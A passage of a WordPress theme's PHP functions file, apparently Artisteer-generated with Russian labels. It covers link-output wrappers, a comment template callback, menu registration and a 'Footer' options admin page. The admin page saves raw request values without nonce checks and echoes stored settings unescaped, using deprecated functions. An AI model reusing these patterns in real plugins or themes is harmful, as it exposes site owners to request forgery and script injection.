		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
